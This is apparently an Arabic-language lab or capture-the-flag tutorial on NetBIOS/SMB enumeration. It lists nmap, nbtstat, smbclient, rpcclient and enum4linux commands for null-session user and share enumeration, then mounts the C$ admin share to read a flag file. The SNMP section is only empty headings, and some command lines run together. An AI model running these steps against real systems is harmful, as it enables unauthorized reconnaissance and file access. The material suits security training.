1. 🌐 لابات عامة للتعداد (NetBIOS و SNMP)
🎯 الهدف الأساسي:
🔧 الخطوات العملية للاستغلال:
nmap -sV -p 137,139,445 <Target_IP>
nbtstat -A <Target_IP> # لأجهزة الويندوز المهاجمة # أو nbtscan -v <Target_IP> # لأجهزة لينكس المهاجمة
net view \\<Target_IP> # لأجهزة الويندوز المهاجمة # أو smbclient -L \\<Target_IP> -N # لأجهزة لينكس المهاجمة (للوصول المجهول)
net use \\<Target_IP>\IPC$ "" /user:"" # لأجهزة الويندوز المهاجمة # أو rpcclient -U "" -N <Target_IP> # لأجهزة لينكس المهاجمةenumdomusers # لتعداد المستخدمين في النطاق enumdomgroups # لتعداد المجموعات في النطاق srvinfo # للحصول على معلومات السيرفر
enum4linux -U <Target_IP> # لتعداد المستخدمين enum4linux -G <Target_IP> # لتعداد المجموعات enum4linux -S <Target_IP> # لتعداد المشاركات
net use Z: \\<Target_IP>\C$ "Password" /user:Usernamedir Z: # أو cd Z:\Users\Bob\Documents dir type flag.txt
sudo mount -t cifs -o username=<username>,password=<password> //<Target_IP>/<Share_Name> /mnt/share # مثال لربط مشاركة عامة بدون كلمة مرور: smbclient // <Target_IP>/public -N # بعد الدخول، لسرد الملفات وتحميلها: ls get <filename> exit
🚀 سيناريو تحدي: استغلال Null Session وربط مشاركة C$ وقراءة فلاج:
C$ وقراءة فلاج:1.2 📊 لاب: SNMP Analysis :
🎯 الهدف الأساسي:
🔧 الخطوات العملية للاستغلال (تحديد نقاط الضعف):
🚀 سيناريو تحدي: استخراج معلومات هامة من SNMP:
Last updated

